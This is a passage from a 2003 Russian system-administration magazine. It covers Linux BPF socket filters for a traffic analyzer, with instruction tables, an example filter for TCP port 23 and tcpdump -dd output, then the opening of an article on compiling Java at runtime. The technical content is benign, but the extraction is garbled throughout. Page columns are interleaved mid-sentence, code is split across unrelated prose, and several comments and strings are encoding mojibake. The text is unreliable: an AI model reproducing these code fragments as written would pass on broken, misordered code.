ность инструкций, составленных в кодах псевдо-машин-
ного языка, который называется BPF – Berkeley Packet
Filter. Этот язык был разработан Стивом Маккеном (Steve
McCanne) и Ван Якобсоном (Van Jacobson). BPF похож на
язык ассемблер. В нем, как и в ассемблере, есть регист-
ры, инструкции для загрузки и хранения операндов, вы-
полнения арифметико-логических операций, условных и
безусловных переходов. Для работы с операндами в BPF
используются регистр-аккумулятор (или просто аккуму-
лятор), индексный регистр, ячейка памяти и внутренний
программный счетчик.
Формат инструкции языка BPF определяет следующая
структура:
struct sock_filter {
__u16 code;
__u8 jt;
__u8 jf;
__u32 k;
};
которая определена в файле <linux/filter.h>.
60
ВЛАДИМИР МЕШКОВ
Назначение полей структуры следующее:

поле k – числовое значение операнда, с которым ра-
ботает инструкция;

поля jt (jump true) и jf (jump false) – меняют порядок
выполнения инструкций;

поле code – код выполняемой инструкции.
Существует 8 типов инструкций. Вначале их пере-
числим, а потом остановимся отдельно на каждом. Итак,
вот эти 8 типов: BPF_LD, BPF_LDX, BPF_ST, BPF_STX,
BPF_ALU, BPF_JMP, BPF_RET, BPF_MISC.
BPF_LD
Инструкция BPF_LD служит для загрузки в аккумулятор
следующих величин:

константы (BPF_IMM);

блока данных, расположенных по фиксированному
смещению (BPF_ABS);

блока данных, расположенных по смещению, которое
является переменной величиной (BPF_IND);

длины блока данных (BPF_LEN);

значения, находящегося в ячейке памяти
(BPF_MEM).
Для значений BPF_IND и BPF_ABS размер загружае-
мых данных должен быть задан как слово (BPF_W), полу-
слово (BPF_H), байт (BPF_B). Здесь имеется в виду ма-
шинное слово, которое равно числу разрядов в регистрах
общего назначения. Для 32-х разрядных процессоров это
значение равно 4 байта.
Примеры использования данной инструкции.
BPF_LD+BPF_W+BPF_ABS A <- P [ k : 4 ]
В аккумулятор загружается 4 байта из блока данных.
Смещение в блоке данных задается константой k.
BPF_LD+BPF_H+BPF_ABS A <- P [ k : 2 ]
 программирование
В аккумулятор загружается 2 байта из блока данных. Сме- ся в ячейке памяти с адресом k.
щение в блоке данных задается константой k.
BPF_LDX+BPF_W+BPF_LEN X <- len
BPF_LD+BPF_B+BPF_ABS A <- P [ k : 1 ]
В индексный регистр загружается длина блока данных.
В аккумулятор загружается 1 байт из блока данных. Сме- Следующая инструкция позволяет быстро определить
щение в блоке данных задается константой k. размер заголовка IP-пакета:

BPF_LD+BPF_W+BPF_IND A <- P [ X + k : 4 -] BPF_LDX+BPF_B+BPF_MSH X <- 4 * ( P [ k : 1 ] & 0xF

В аккумулятор загружается 4 байта из блока данных. Сме-
щение в блоке данных задается суммой переменных X и
константы k. Переменная X является значением, находя-
щимся в индексном регистре.
BPF_LD+BPF_H+BPF_IND A <- P [ X + k : 2 ]
В аккумулятор загружается 2 байта из блока данных. Сме-
щение в блоке данных задается суммой переменных X и
константы k. Переменная X является значением, находя-
щимся в индексном регистре.
BPF_LD+BPF_B+BPF_IND A <- P [ X + k : 1 ]
В аккумулятор загружается 1 байт из блока данных. Сме-
щение в блоке данных задается суммой переменных X и
константы k. Переменная X является значением, находя-
щимся в индексном регистре.
)
Длина заголовка находится в младших 4 битах нулевого
байта IP-пакета и содержит количество 32-битных слов в
заголовке. Поскольку минимальный размер заголовка 20
байт (т.е. пять 32-битных слов), то минимальное значение
этого поля равно 5. Старшие 4 бита содержат версию про-
токола и для IPv4 это значение равно 4. Итак, предполо-
жим, что в нулевом байте находится значение 0x45. Эту
величину мы загружаем в индексный регистр и осуществ-
ляем операцию логического И: 0x45 & 0xF = 0x5. Умноже-
ние на 4 эквивалентно логическому сдвигу на 2 бита в сто-
рону старших разрядов, при этом значения старших раз-
рядов теряются. В итоге в индексном регистре будет нахо-
диться значение 0x5 * 4 = 0x14, в десятичном представле-
нии – 20. Это и есть длина заголовка IP-пакета в байтах.
BPF_ST
Инструкция BPF_ST служит для загрузки аккумулятора в
ячейку памяти:

BPF_LD+BPF_W+BPF_LEN A <- len BPF_ST M [ k ] <- A

В аккумулятор загружается длина блока данных. Значение k определяет адрес ячейки памяти.

BPF_LD+BPF_IMM A <- k BPF_STX

Инструкция BPF_STX служит для загрузки индексного ре-
В аккумулятор загружается константа k. гистра в ячейку памяти:

BPF_LD+BPF_MEM A <- M [ k ] BPF_STX M [ k ] <- X

В аккумулятор загружается значение, находящееся в ячей- Значение k определяет адрес ячейки памяти.
ке памяти с адресом k. BPF_ALU Инструкция BPF_ALU выполняет арифме-
тико-логические между аккумулятором и индексным ре-
BPF_ST гистром или константой. Результат сохраняется в акку-
Инструкция BPF_LDX служит для загрузки в индексный муляторе.
регистр следующих величин:

константы (BPF_IMM); BPF_ALU+BPF_ADD+BPF_K
BPF_ALU+BPF_SUB+BPF_K
A
A
<-
<-
A
A
+ k
— k

значения, находящегося в ячейке памяти (BPF_MEM); BPF_ALU+BPF_MUL+BPF_K A <- A * k

длины блока данных (BPF_LEN). BPF_ALU+BPF_DIV+BPF_K
BPF_ALU+BPF_AND+BPF_K
A
A
<-
<-
A
A
/ k
& k
BPF_ALU+BPF_OR+BPF_K A <- A | k
Примеры использования данной инструкции. BPF_ALU+BPF_LSH+BPF_K A <- A << k
BPF_ALU+BPF_RSH+BPF_K A <- A >> k
BPF_ALU+BPF_ADD+BPF_X A <- A + X
BPF_LDX+BPF_W+BPF_IMM X <- k
Здесь я не вижу необходимости в комментариях, все про-
В индексный регистр загружается константа k, размер зрачно.
которой составляет 4 байта.
BPF_JMP
BPF_LDX+BPF_W+BPF_MEM X <- M [ k ] Инструкция BPF_JMP изменяет порядок выполнения про-
граммы фильтрации. Данная инструкция может осуществ-
В индексный регистр загружается значение, находящее- лять как условный, так и безусловный переход между ин-

№2(3), февраль 2003 61

 программирование
струкциями. При безусловном переходе (BPF_JA, jump Все изменения необходимо внести только в главную функ-
always) смещение задается 32-битным значением, при ус- цию. Перед тем как приступить к реализации пакетного филь-
ловном – 8-битным. тра, необходимо определить условия фильтрации. В нашем
примере условия следующие: обрабатываться будут паке-
BPF_JMP+BPF_JA pc += k ты IP-протокола, адрес отправителя – 192.168.1.2, транспор-
тный протокол – TCP, порт источника – 23.
Безусловный переход по смещению, заданному 32-раз- Алгоритм реализации следующий:
рядным значением k.
определить необходимые переменные и заголовочные
файлы;
BPF_JMP+BPF_JGT+BPF_K pc += ( A > k ) ? jt : jf
составить программу фильтрации в кодах языка BPF;

привязать полученный фильтр к сокету.
Сравнение значений аккумулятора и константы k. Ус-
ловный переход по смещению, заданному в поле jt при Переменные и заголовочные файлы
выполнении условия A > k. Нам необходим один заголовочный файл:

BPF_JMP+BPF_JGE+BPF_K pc += ( A >= k ) ? jt : jf # include <linux/filter.h>

BPF_JMP+BPF_JEQ+BPF_K pc += ( A == k ) ? jt : jf
BPF_JMP+BPF_JSET+BPF_K pc += ( A & k ) ? jt : jf
BPF_JMP+BPF_JGT+BPF_X pc += ( A > X ) ? jt : jf и структура:

Сравнение значений аккумулятора и индексного реги- struct sock_fprog *Filter;

стра. Условный переход по смещению, заданному в поле
jt при выполнении условия A > X. – непосредственно сам подключаемый фильтр.

BPF_JMP+BPF_JGE+BPF_X
BPF_JMP+BPF_JEQ+BPF_K
pc += ( A >= X ) ? jt : jf
pc += ( A == X ) ? jt : jf
BPF_JMP+BPF_JSET+BPF_K pc += ( A & X ) ? jt : jf
BPF_RET
Программа фильтрации выполняется для каждого пакета,
поступающего на сетевой интерфейс. Результатом работы
фильтра является целое положительное число, показыва-
ющее, сколько байт в принятом пакете будет доступно для
дальнейшей обработки приложению пользователя. Если
принятый пакет не удовлетворяет условиям фильтрации,
он отбрасывается и программой фильтрации возвращает-
ся нулевое значение. Инструкция BPF_RET завершает вы-
полнение программы фильтрации и возвращает число байт
в пакете, доступных для дальнейшей обработки.
Программа фильтрации
Программа фильтрации представляет собой массив струк-
тур struct sock_filter. При ее составлении воспользуемся
макросами BPF_STMP и BPF_JUMP, которые определе-
ны в заголовочном файле <linux/filter>.
struct sock_filter BPF_code [ ] = {
BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 12),
В принятом Ethernet-кадре по смещению, равному 12 байт
(6 байт MAC-адреса источника + 6 байт MAC-адреса назна-
чения), находится 2-х байтовый идентификатор протокола
сетевого уровня. Эти 2 байта мы загружаем в аккумулятор.
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ETH_P_IP, 0, 8),

BPF_RET+BPF_A
Проверяем соответствие значения, загруженного в ак-
кумулятор, идентификатору IP-протокола (ETH_P_IP =
Возвращаемый результат находится в аккумуляторе. 0x800). При выполнении условия переходим к следующей
инструкции (jt = 0). В противном случае смещаемся на 8
BPF_RET+BPF_K
структур вниз (jf = 8) и выходим из программы фильтра-
ции с возвратом нулевого значения. Это значит, что дан-
Результат возвращается в виде константы. ный пакет отброшен.

BPF_MISC BPF_STMT(BPF_LD+BPF_W+BPF_ABS, 26),

Инструкция BPF_MISC служит для копирования значения
индексного регистра в аккумулятор и наоборот. Загружаем в аккумулятор 4-байтовое значение, нахо-
дящееся по смещению 26 в принятом пакете. Это значе-
BPF_MISC+BPF_TAX X <- A ние соответствует IP-адресу источника.
BPF_MISC+BPF_TXA A <- X
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 0xC0A80102, 0, 6),

Пример реализации пакетного фильтра Проверяем соответствие значения, загруженного в ак-

Здесь мы с помощью фильтра модифицируем исходный код кумулятор, IP-адресу 192.168.1.2. Значение 0xC0A80102 –
анализатора сетевого трафика (см. «Анализатор сетевого это шестнадцатиричное представление данного IP-адреса.
трафика», «Системный администратор» №1, октябрь 2002г.). Однако в сетевом формате адрес 192.168.1.2 выглядит как

62
 программирование
0x201A8C0. Это связано с порядком передачи в сети – пе- рес. Для хранения введенного IP-адреса нам потребуют-
редача начинается с бита младшего разряда. Если адрес ся дополнительные переменные:
не совпадает – выходим из программы фильтрации.
union {
BPF_STMT(BPF_LD+BPF_B+BPF_ABS, 23), u_long net;
char point [4];
} addr;
Загружаем в аккумулятор 1 байт, находящийся по сме-
щению 23. В этом поле содержится идентификатор про- В поле net объединения addr будет храниться введен-
токола транспортного уровня. Для протокола TCP это зна- ный IP-адрес в сетевом формате. Заполним поле net:
чение равно 6.
addr. net = inet_addr (argv [1]);
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, IPPROTO_TCP, 0, 4),
Теперь необходимо зеркально перевернуть значение
Проверяем соответствие транспортного протокола. IP-адреса в сетевом формате. Сделаем это, поменяв ме-
Далее нам необходимо проверить поле «Порт источ- стами 0-й и 3-й байты, 1-й и 2-й:
ника» на соответствие значению 23. Для этого необходи-
мо сперва установить длину заголовка IP-пакета. addr. point [0] ^= addr. point [3];
addr. point [3] ^= addr. point [1];
addr. point [0] ^= addr. point [3];
BPF_STMT(BPF_LDX+BPF_B+BPF_MSH, 14), addr. point [1] ^= addr. point [2];
addr. point [2] ^= addr. point [1];
addr. point [1] ^= addr. point [2];
В индексный регистр будет загружено значение дли-
ны заголовка IP-пакета. По смещению, равному сумме Заполним необходимое поле в массиве BPF_code:
длин Ethernet-заголовка и IP-заголовка, будет находиться
поле «Порт источника». Загрузим его в аккумулятор: BPF_code [3]. k = addr. net;

BPF_STMT(BPF_LD+BPF_H+BPF_IND, 14), Таким образом, если мы введем адрес 192.168.1.2, поле

BPF_code [3]. k будет содержать значение 0xC0A80102. Для
и проверим полученное значение: контроля можно отобразить это значение:

BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 0x17, 0, 1), printf( « %x \n «, BPF_code[3]. k );

Выходим из программы фильтрации. После этого подключаем фильтр к сокету и работаем.

BPF_STMT(BPF_RET+BPF_K,1500),
BPF_STMT(BPF_RET+BPF_K,0),
Использование tcpdump
}; Для упрощения задачи составления программы фильтра-
Çàïîëíèì ïîëÿ ñòðóêòóðû struct sock_fprog *Filter : ции можно воспользоваться утилитой tcpdump. Давайте
Filter -> len = 11; - çíà÷åíèå ïîëÿ len ðàâíî
÷èñëó ñòðóêòóð â ìàññèâå BPF_code [ ] рассмотрим, как это делается. Предположим, нам необ-
Filter -> filter = BPF_code; - óêàçàòåëü íà ìàññèâ ñòðóê- ходим пакетный фильтр, принимающий IP-пакеты, адре-
òóð BPF_code [ ]
сатом или отправителем которых является хост с IP-адре-
Ïðèâÿçêà ôèëüòðà ê ñîêåòó âûïîëíÿåòñÿ ïðè ïîìîùè âûçîâà сом 192.168.9.1. Вводим следующую команду:
setsockopt ñëåäóþùèì îáðàçîì:
if ( setsockopt ( e0_r, SOL_SOCKET, SO_ATTACH_FILTER, Filter, tcpdump -dd host 192.168.9.1
sizeof (*Filter) ) < 0 ) {
perror ( "SO_ATTACH_FILTER" );
close ( e0_r ); На консоли будет отображен результат работы программы:
exit (1);
}
{ 0x28, 0, 0, 0x0000000c },
В приведенном примере есть один недостаток: исходные { 0x15, 0, 4, 0x00000800 },
{ 0x20, 0, 0, 0x0000001a },
данные, такие как IP-адрес, номер порта, вводятся в текст { 0x15, 8, 0, 0xc0a80901 },
программы. При необходимости изменения условий фильт- { 0x20, 0, 0, 0x0000001e },
{ 0x15, 6, 7, 0xc0a80901 },
рации придется каждый раз вносить изменения в исходный { 0x15, 1, 0, 0x00000806 },
текст и перекомпилировать программу. Модифицируем про- { 0x15, 0, 5, 0x00008035 },
{ 0x20, 0, 0, 0x0000001c },
грамму фильтрации для возможности гибкой настройки { 0x15, 2, 0, 0xc0a80901 },
фильтра на новое условие, например, на новый IP-адрес. IP- { 0x20, 0, 0, 0x00000026 },
{ 0x15, 0, 1, 0xc0a80901 },
адрес будем вводить в командной строке (аргумент argv [1]). { 0x6, 0, 0, 0x00000044 },
В массиве BPF_code третий элемент перепишем в виде: { 0x6, 0, 0, 0x00000000 },

BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 0, 0, 4), Это и есть искомая программа фильтрации.

Вот в принципе все, о чем я хотел рассказать. Обо всех
В этой инструкции мы обнуляем поле, содержащее IP-ад- замечаниях и предложениях пишите на ubob@mail.ru.

№2(3), февраль 2003 63

 JAVA:
МАГИЯ ОТРАЖЕНИЙ

Часть III. КОМПИЛЯЦИЯ JAVA СРЕДСТВАМИ JAVA

ДАНИИЛ АЛИЕВСКИЙ

В предыдущих частях статьи мы познакомились с техноло-
гией отражений (Java Reflection). Это мощнейший механизм
Java, позволяющий делать с .class-файлами практически все
что угодно – загружать из произвольных файлов, анализи-
ровать набор членов класса, обращаться к этим членам, при
необходимости обходя стандартную защиту «private»/
«protected». При желании можно даже подменить стандарт-
ный механизм загрузки Java-классов и взять этот процесс
под полный контроль, например, разрешить перезагружать
изменившиеся версии .class-файлов без полной перезагруз-
ки Java-машины (эта техника подробно рассматривалась в
части II, см. №1(2) журнала «Системный администратор»).
В этой части статьи мы научимся компилировать Java-
код в .class-файлы. Совместно с технологией отражений
это позволит в процессе исполнения программы «на лету»
создавать новые классы в виде исходного текста, компи-
лировать их, загружать и использовать. Столь мощные
возможности обычно присущи лишь чисто интерпретиру-
емым, сравнительно медленным языкам типа JavaScript
или Perl или Ассемблеру (точнее, машинному языку).
Всюду далее, если не оговорено обратное, мы будем
подразумевать последнюю (на момент написания статьи)
версию Java фирмы Sun: Sun Java SDK 1.4.
Как скомпилировать Java-файл
с исходным текстом
Решение, вообще говоря, совершенно банально – выз-
вать стандартный компилятор javac!
На первый взгляд подобное решение кажется неизящ-
ным, сопряженным с массой проблем. Например, компи-
лятор придется поставлять всем вашим пользователям.
Другой пример – интеграция компилятора с вашей систе-
мой: сообщения компилятора должны выдаваться не на
системную консоль, а «внутрь» вызывающей программы
для обработки и визуализации в рамках вашего пользо-
вательского интерфейса.
Разработчики Java позаботились о том, чтобы эти про-
блемы легко решались.
Прежде всего, стандартный компилятор javac входит
в комплект поставки Sun Java SDK, распространяемого
совершенно бесплатно. Правда, здесь есть одна тонкость.
При формировании дистрибутива Java-приложения
обычно принято включать в этот дистрибутив некий
фрагмент Java SDK, так называемый JRE (Java2 TM
Runtime Environment) – набор файлов, достаточный для
запуска Java-приложения. В комплекте Sun Java SDK
этот набор оформлен в виде подкаталога jre/. По умол-
чанию JRE не содержит компилятора javac (и ряда дру-
гих полезных утилит из Java SDK). Включать в дистри-
бутив полный пакет Java SDK запрещено лицензион-
ным соглашением фирмы Sun.
Однако в том же лицензионном соглашении специ-
ально оговорено, что компилятор байт-кода javac вме-
сте с необходимым вспомогательным JAR-файлом
tools.jar можно включать в дистрибутив в дополнение к
стандартному JRE, точнее, распространять совместно
с Java-приложением. См. файл jre/license в комплекте
поставки Sun Java SDK 1.4.1, раздел «JavaTM 2 runtime
environment (j2re), standard edition, version 1.4.1_x
№2(3), февраль 2003
программирование
supplemental license terms», пункт 3 и файл jre/
README.txt, раздел «Redistribution of Java 2 SDK Files».
Но самое приятное заключается в том, что в действи-
тельности компилятор фирмы Sun реализован на том же
языке Java – в виде класса com.sun.tools.javac.Main и па-
кета вспомогательных классов, размещенных в архиве
tools.jar. Утилита javac является всего-навсего «оболоч-
кой», стартующей виртуальную машину Java и запускаю-
щей указанный класс. Архив tools.jar, как и саму утилиту
javac, разрешается свободно распространять (в дополне-
ние к стандартному JRE) совместно с Java-приложением.
Это означает, что для компиляции Java-класса из Java-
приложения нет необходимости обращаться к внешней
утилите javac средствами операционной системы (мето-
дами Runtime.getRuntime().exec(...)). Можно напрямую вос-
пользоваться классом com.sun.tools.javac.Main.
Использование класса com.sun.tools.javac.Main пре-
дельно просто. Вот полный интерфейс этого класса (кон-
структор и public-методы):
// Constructors
public Main()
// Methods
public static void main(String[] p0)
public static int compile(String[] p0)
public static int compile(String[] p0,
PrintWriter p1)
Для вызова компилятора нужно обратиться к к одно-
му из двух его static-методов compile.
В качестве аргумента p0 нужно передать массив
строк-параметров, которые обычно передаются утили-
те javac, например:
new String[] {
"-d",
"/ïóòü_ê_ïîäêàòàëîãó",
"myfile.java"
}
В качестве аргумента p1 во второй из этих методов
нужно передать поток вывода, который будет использо-
ваться для вывода всех сообщений компилятора. Таким
образом можно «перехватить» все сообщения компиля-
тора и перенаправить их в свой собственный буфер, ко-
торый впоследствии можно проанализировать или пока-
зать пользователю.
В качестве результата оба метода возвращают стан-
дартный код возврата утилиты javac (errorlevel в терми-
нах MS-DOS). 0 сигнализирует об успешном завершении,
другие значения – о каких-либо ошибках.
Приведем пример вызова компилятора путем обраще-
ния к классу com.sun.tools.javac.Main:
String[] args= ïàðàìåòðû óòèëèòû javac;
CharArrayWriter writer= new CharArrayWriter();
int result= com.sun.tools.javac.Main.compile(
args,
new PrintWriter(writer,true));
if (result!=0) {
/* - ïðîèçîøëà êàêàÿ-òî îøèáêà */
àíàëèçèðóåì è, âîçìîæíî, ïîêàçûâàåì
ïîëüçîâàòåëþ ñòðîêó ñîîáùåíèé
êîìïèëÿòîðà writer.toString()
}
65
 программирование
Описанное решение очень просто, удобно и эффек-
тивно. Но у него есть серьезный недостаток.
Класс com.sun.tools.javac.Main, как и все классы из паке-
тов com.sun.* и sun.*, является недокументированным. При-
веденное выше описание использования класса опирается
на здравый смысл и эксперименты, а не на официальную
документацию фирмы Sun. Фирма Sun имеет полное право
в очередной версии Java SDK изменить поведение или ин-
терфейс этого класса или даже вообще исключить его.
Указанная проблема не надумана.
Действительно, все сказанное выше справедливо лишь
для версии Sun Java SDK 1.4. В предыдущей версии, Sun
Java SDK 1.3, тот же самый класс com.sun.tools.javac.Main
имел совершенно другой интерфейс:
// Constructors
public Main()
// Methods
public static void main(String[] p0)
public int compile(String[] p0)
Метод compile не был статическим, т.е. нуждался в со-
здании экземпляра класса. Также отсутствовала версия
метода, позволяющая указать собственный поток для со-
общений компилятора.
В версии Java SDK 1.3 для компиляции исходных тек-
стов Java обычно использовался другой класс,
sun.tools.javac.Main (расположенный все в том же архиве
tools.jar). Этот класс также позволяет указать свой поток
для сообщений компилятора. Причем этот класс полнос-
тью сохранил свой интерфейс при переходе от версии SDK
1.3 к SDK 1.4.
Класс sun.tools.javac.Main имеет нестатический синх-
ронизованный метод compile:
public synchronized boolean compile(
String[] p0)
Поток для сообщений компилятора указывается в ка-
честве первого параметра конструктора:
public Main(
OutputStream p0,
String p1)
(не PrintWriter, а более «архаичный» OutputStream). Смысл
второго параметра конструктора я так и не выяснил, но
найденные мной в Интернете примеры использования дан-
ного класса передавали в качестве p1 строку «javac».
Код возврата утилиты javac возвращается отдельным
методом:
public int getExitStatus()
Факт успешности компиляции можно также узнать по
boolean-результату метода compile (false означает неудачу).
Но и этот класс, несмотря на сохранение интерфейса,
в действительности изменил свое поведение при перехо-
де от версии SDK 1.3 к SDK 1.4.
Во-первых, он был объявлен как устаревший
(«deprecated»). Конечно, предупреждение компилятора,
66
появляющееся при попытке использовать данный класс
(«warning: sun.tools.javac.Main in sun.tools.javac has been
deprecated»), можно и проигнорировать. Но фирма Sun
почему-то решила добавлять аналогичное предупрежде-
ние в любое сообщение, выдаваемое самим компилято-
ром sun.tools.javac.Main! Если попытаться использовать
sun.tools.javac.Main для компиляции любого, даже совер-
шенно корректного Java-файла, в любом случае будет вы-
дано предупреждение «sun.tools.javac.Main has been
deprecated». Чтобы избавиться от него, sun.tools.javac.Main
придется использовать с ключом «-nowarn», но тогда во-
обще теряется возможность получать и анализировать
предупреждения компилятора.
Во-вторых, в версии Sun Java SDK 1.4 компилятор
sun.tools.javac.Main попросту не всегда адекватно рабо-
тает. На простых тестах это трудно обнаружить. Но ког-
да я попытался скомпилировать с помощью этого ком-
пилятора все исходные тексты большого Java-проекта,
обнаружилось, что некоторые сложные, но вполне кор-
ректные классы, прекрасно компилируемые «штатными»
компиляторами и классом com.sun.tools.javac.Main, не
компилируются с помощью sun.tools.javac.Main. В част-
ности, компилятор sun.tools.javac.Main «сломался» на не-
которых нетривиальных случаях перегрузки методов с
аргументами примитивных типов, а также при попытке
объявить метод toString() у некоторого вложенного клас-
са. Это очень похоже на внутреннюю ошибку компиля-
тора, которую фирма Sun не сочла нужным исправлять
в устаревшем наборе классов.
Есть также мелкие отличия в самом синтаксисе язы-
ка Java, понимаемом компиляторами sun.tools.javac.Main
и стандартным com.sun.tools.javac.Main. (Ошибка, о ко-
торой ранее шла речь, не связана с этими мелкими от-
личиями – там действительно имела место явная ошиб-
ка компилятора.) Например, sun.tools.javac.Main разре-
шает импортировать (предложением import) конкретные
классы, расположенные в корневом пакете – т.е. непос-
редственно в корне одного из каталогов, перечисленных
в путях поиска CLASSPATH. Стандартный компилятор в
современных версиях Java не допускает такого экзоти-
ческого импорта – все импортируемые классы должны
лежать внутри какого-либо пакета.
Также можно заметить, что в версии Sun Java SDK 1.4
компилятор sun.tools.javac.Main работает примерно вдвое
медленнее, чем com.sun.tools.javac.Main.
Все сказанное означает, что использование для ком-
пиляции Java-файлов конкретных классов типа
com.sun.tools.javac.Main или sun.tools.javac.Main – рис-
кованное занятие. Соответствующий код придется за-
ново тестировать при выпуске каждой новой версии
Java SDK и, возможно, в какой-то момент его придется
радикально переписывать.
В случае com.sun.tools.javac.Main лично мне риск не
кажется слишком большим. Похоже, что в этом классе
фирма Sun наконец «довела до ума» решения, существо-
вавшие в предыдущих версиях Java в этом же классе и в
sun.tools.javac.Main. Трудно представить, чтобы возмож-
ности класса com.sun.tools.javac.Main в какой-то версии
исчезли или радикально поменялись. Скорее всего, этот

класс либо сохранится, либо превратится в легальный до-
кументированный класс, например, в пакете java.*, тогда
необходимые изменения будут минимальны.
Если необходимо надежное документированное реше-
ние, то на сегодня единственный доступный вариант –
вызвать внешнюю утилиту javac одним из методов
Runtime.getRuntime().exec(...).
Для этого, правда, эту утилиту нужно еще найти в фай-
ловой системе. Если данная утилита входит в состав дист-
рибутива и инсталлируется вместе с Java-приложением, то
инсталлятор может сам позаботиться о том, чтобы полный
путь к утилите javac передавался в Java-программу. Если
же приложение дожно работать под управлением «чужо-
го» Java SDK, инсталлируемого пользователем независи-
мо от приложения, то можно поискать файлы:

bin/javac.exe (случай Microsoft Windows);

bin/javac (случай Unix/Linux);

bin/sparcv9/javac (случай Solaris SPARC)
в каталоге System.getProperty(«java.home») и содержащем
его каталоге. (Чаще всего System.getProperty(«java.home»)
соответствует подкаталогу jre/ в главном каталоге Sun
Java SDK. Соответственно, утилита javac расположена в
подкаталоге bin/ содержащего его каталога.)
Для получения сообщений компилятора в данном слу-
чае можно использовать стандартную технику – чтение
из потоков, возвращаемых методами getInputStream() и
getErrorStream() объекта Process, полученного в резуль-
тате обращения к методу Runtime.getRuntime().exec(...).
Вот как примерно это выглядит:
Process p= Runtime.getRuntime().exec(
ìàññèâ_àðãóìåíòîâ);
/* - ïåðâûé ýëåìåíò â ìàññèâå äîëæåí
ñîäåðæàòü ïîëíîå èìÿ ôàéëà óòèëèòû
javac, îñòàëüíûå ýëåìåíòû -
ïàðàìåòðû ýòîé óòèëèòû */
final InputStreamReader is=
new InputStreamReader(p.getInputStream());
final InputStreamReader es=
new InputStreamReader(p.getErrorStream());
final StringBuffer out= new StringBuffer();
final StringBuffer err= new StringBuffer();
new Thread() {
public void run() {
try {
char[] buf= new char[32768];
int len;
while ((len=is.read(buf,0,buf.length))>=0) {
out.append(buf,0,len);
}
} catch (Exception e) {
e.printStackTrace();
}
} са java.io.File. Основная идея – циклически генерировать
}.start();
new Thread() {
public void run() {
... (àíàëîãè÷íûé öèêë äëÿ es è err)
} File.mkdir) и выйти из цикла, как только очередная попытка
}.start();
int result= p.waitFor();
/* - äîæèäàåìñÿ çàâåðøåíèÿ óòèëèòû javac
è ïîëó÷àåì åå êîä çàâåðøåíèÿ */
if (result!=0) {
/* - ïðîèçîøëà êàêàÿ-òî îøèáêà */
àíàëèçèðóåì è, âîçìîæíî, ïîêàçûâàåì
ïîëüçîâàòåëþ ñîîáùåíèÿ êîìïèëÿòîðà
out è err
}
№2(3), февраль 2003
программирование
Обратите внимание: чтение потоков вывода и ошибок
в отдельных параллельных потоках совершенно необходи-
мо. Если этого не сделать, то вызов метода waitFor() может
привести к зависанию в случае, когда внешняя программа
выводит хоть что-нибудь в свои потоки вывода и ошибок.
Как скомпилировать исходный текст
Java, заданный в виде строки
Итак, мы научились вызывать компилятор Java. Таким об-
разом можно скомпилировать любой Java-файл – доста-
точно следовать инструкциям по использованию компи-
лятора javac. Но что делать, если у нас нет готового Java-
файла, размещенного где-то в файловой системе? Допу-
стим, мы располагаем просто исходным текстом Java-про-
граммы в виде строки типа String – загруженным, скажем,
из базы данных, или сгенерированным автоматически. Как
скомпилировать такой текст?
Очевидно, нужно создать некоторый временный файл с
расширением .java, записать туда исходный текст, после чего
вызвать компилятор. Эти действия далеко не так просты,
как кажется на первый взгляд. Рассмотрим это подробнее.
В стандартных библиотеках Java есть средства для со-
здания временных файлов – это 2 статических метода
createTempFile класса File, создающие файл с уникальным
«случайным» именем. К сожалению, воспользоваться ими
в данном случае невозможно. Новый Java-файл, создава-
емый для сохранения заданного исходного Java-кода, не
может иметь произвольное имя – его имя обязательно дол-
жно совпадать с именем public-класса, объявленного в этом
исходном коде (если, конечно, таковой имеется). Кроме
того, нужен какой-то каталог, куда будут записаны .class-
файлы, полученные в результате компиляции.
Все это означает, что нужна специальная функция, со-
здающая временный подкаталог – так же, как File.create-
TempFile создает временный файл. Внутри этого подката-
лога можно создать серию вложенных каталогов, соответ-
ствующую пакету, в котором должен располагаться компи-
лируемый класс. Затем в самый внутренний каталог нуж-
но записать Java-файл с исходным текстом, присвоив это-
му файлу имя, соответствующее имени компилируемого
класса. Эту же структуру каталогов можно использовать
для размещения результирующих .class-файлов, передав
соответствующие инструкции компилятору javac.
Написать функцию создания временного каталога не
очень сложно. Достаточно использовать в качестве образ-
ца реализацию File.createTempFile в исходном тексте клас-
более или менее случайные имена подкаталогов внутри
каталога временных файлов операционной системы, для
каждого подкаталога пытаться его создать (методом
будет удачной (mkdir вернет true). Цикл генерации имен и
создания подкаталога нужно синхронизовать относитель-
но какого-либо глобального объекта точно так же, как это
сделано в методе File.createTempFile. Чтобы найти умолча-
тельный каталог временных файлов операционной систе-
мы, можно обратиться к переменной среды:
System.getProperty("java.io.tmpdir")
67
 программирование
В версии Sun Java SDK 1.4.1 эта переменная является
документированной (в отличие от Sun Java SDK 1.3).
Возникает также проблема автоматического удаления
созданного временного подкаталога при выходе из Java-
программы. В случае файла эта задача решалась бы ме-
тодом deleteOnExit класса File. Но непустые подкаталоги
этот метод удалять не умеет. Самое простое решение –
написать функцию, рекурсивно удаляющую созданный
временный каталог вместе со всеми файлами и подката-
логами, и вызвать ее в потоке, зарегистрированном ме-
тодом Runtime.getRuntime().addShutdownHook(...).
Следующий вопрос, требующий некоторого внимания –
как правильно записать Java-файл с исходным текстом. Ис-
ходный текст Java (представленный по условию в виде строки
String) может содержать произвольные символы Unicode, а
компилятор javac обычно используется с ASCII-файлами.
Здесь есть два решения. Во-первых, начиная с версии
Sun Java SDK 1.4, компилятор javac «понимает» дополни-
тельный параметр «-encoding». Можно, например, сохра-
нить файл в кодировке «UTF-8» и указать такую же коди-
ровку в качестве параметра «-encoding». Чтобы сохранить
текст в файле с заданной кодировкой, используется
объект java.io.Writer, создаваемый вызовом:
OutputStreamWriter writer= new OutputStreamWriter(
new FileOutputStream(file),encoding)
Во-вторых, компилятор javac – и в SDK 1.4, и в преды-
дущих версиях – поддерживает специальный способ коди-
рования Unicode-символов. А именно, цепочка символов
вида \uNNNN, где N – шестнадцатеричные цифры, в лю-
бом месте Java-файла воспринимается компилятором как
Unicode-символ с кодом NNNN. Можно перед записью Java-
файла заменить все символы с кодами ≥128 такими це-
почками и записать полученный «чистый» ASCII-файл.
После того как исходный текст скомпилирован, если
компилятор сообщил об отсутствии ошибок (нулевой код
возврата) и если параметры компилятора были заданы
правильно (точнее, параметр «-d»), можно ожидать, что в
структуре каталогов появятся все необходимые .class-
